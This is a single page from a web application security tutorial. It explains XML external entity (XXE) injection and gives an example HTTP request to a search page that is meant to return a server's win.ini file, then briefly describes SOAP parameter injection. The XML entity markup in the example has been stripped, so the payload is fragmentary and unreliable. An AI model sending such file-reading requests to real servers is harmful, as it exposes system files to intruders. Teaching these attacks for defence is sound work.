Web application security - the fast guide 1.1 | Page 149

Chapter 7 - Attack execution (3) P a g e | 149 The main problem here is the echo functionality when part of the server response contains the requested search string. In this case an attack named XXE (external Entity Injection) can be applicable. Attack requirement: A. Usage of XML format in the request B. No validation for SYSTEM or ENTITY keywords. C. Echo functionality is available. Attack Process the attacker uses a definition header in the XML request using the DOCTYPE keyword ]> This definition will make any usage of ampersand with the entity reference parsed as the entity value. The dangerous part is that entities can be defined using external reference using the SYSTEM keyword and the standard URL format with (file:) protocol. A simple example about this type of usage is the following listing that illustrates the usage of XML format in an HTTP request to send data to a search page POST /search/searchPage.ashx HTTP/1.1 Host: victim.com Content-Type: text/xml; charset=UTF-8 Content-Length:117 ]> &xxe The result will be returning the contents of win.ini file as part of the server response. 7.9 Attack SOAP Services SOAP stands for simple object access protocol which is an encapsulation technique to facilitate message based communications, it can be used to integrate different system with different platforms Attack requirement: No validation on the parameters values. Attack process The attack depends on injecting an XML tags inside the URL calling the web service which will cause affecting the transferred message and trick the victim system.